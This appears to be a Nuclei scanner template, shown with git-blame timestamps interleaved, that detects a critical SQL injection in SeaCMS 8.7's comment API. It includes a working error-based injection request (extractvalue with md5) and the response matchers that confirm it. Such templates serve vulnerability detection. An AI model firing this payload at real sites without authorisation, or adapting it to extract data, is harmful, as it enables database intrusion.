2022-04-05 13:12:45 +00:00
id : seacms-sqli
2022-04-22 10:38:41 +00:00
2022-04-05 13:12:45 +00:00
info :
2022-09-29 13:38:41 +00:00
name : SeaCMS 8.7 - SQL Injection
2022-04-05 13:12:45 +00:00
author : ritikchaddha
2022-09-29 13:38:41 +00:00
severity : critical
description : SeaCMS 8.7 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
2022-04-05 13:12:45 +00:00
reference :
- https://www.uedbox.com/post/54561/
2022-09-29 13:38:41 +00:00
classification :
cvss-metrics : CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score : 10.0
cwe-id : CWE-89
2022-04-06 04:48:53 +00:00
tags : seacms,sqli
2022-04-05 13:12:45 +00:00
2022-06-30 03:13:38 +00:00
variables :
num : "999999999"
2022-04-05 13:12:45 +00:00
requests :
- method : GET
path :
2022-06-30 03:13:38 +00:00
- "{{BaseURL}}/comment/api/index.php?gid=1&page=2&rlist[]=@`%27`,%20extractvalue(1,%20concat_ws(0x20,%200x5c,(select%20md5({{num}})))),@`%27`"
2022-04-06 04:48:53 +00:00
2022-10-07 21:27:25 +00:00
host-redirects : true
2022-04-06 04:48:53 +00:00
max-redirects : 2
2022-04-05 13:12:45 +00:00
matchers-condition : and
matchers :
2022-04-06 04:48:53 +00:00
- type : word
part : body
words :
2022-06-30 03:13:38 +00:00
- '{{md5({{num}})}}'
2022-04-06 04:48:53 +00:00
2022-04-05 13:12:45 +00:00
- type : status
status :
- 200
2022-09-29 13:38:41 +00:00
# Enhanced by mp on 2022/09/28